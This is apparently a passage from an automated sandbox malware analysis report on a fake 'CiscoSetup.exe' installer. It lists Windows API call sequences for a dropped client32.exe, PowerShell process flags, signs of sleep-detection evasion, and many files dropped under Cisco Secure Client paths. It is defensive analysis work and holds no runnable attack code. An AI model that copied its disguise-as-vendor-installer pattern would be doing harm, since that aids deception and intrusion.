                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,9_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,9_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,9_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1110F600 IsIconic,GetTickCount,9_2_1110F600
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,9_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,9_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,9_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,9_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,9_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029230
                                  Source: C:\Users\user\Desktop\CiscoSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Contains functionality to detect sleep reduction / modifications
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069C006_2_11069C00
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069C996_2_11069C99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688F91F06_2_688F91F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_68904F306_2_68904F30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,6_2_11127110
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7105Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2626Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeWindow / User API: threadDelayed 436Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeWindow / User API: threadDelayed 8000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-0CFDM.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-96AL6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-I704D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-N98KR.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KHO2L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-91CSN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-98QQL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EUMLH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8761D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-7ITNQ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-O18K3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-970AL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-RN0PK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3JN2R.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T4BIJ.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-Q7F68.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KLEUG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-P9NEN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\is-VTFF8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-URJD8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D0HIO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q7D23.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-SINFC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-1KC0P.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-5J2U6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OJMRD.tmpJump to dropped file
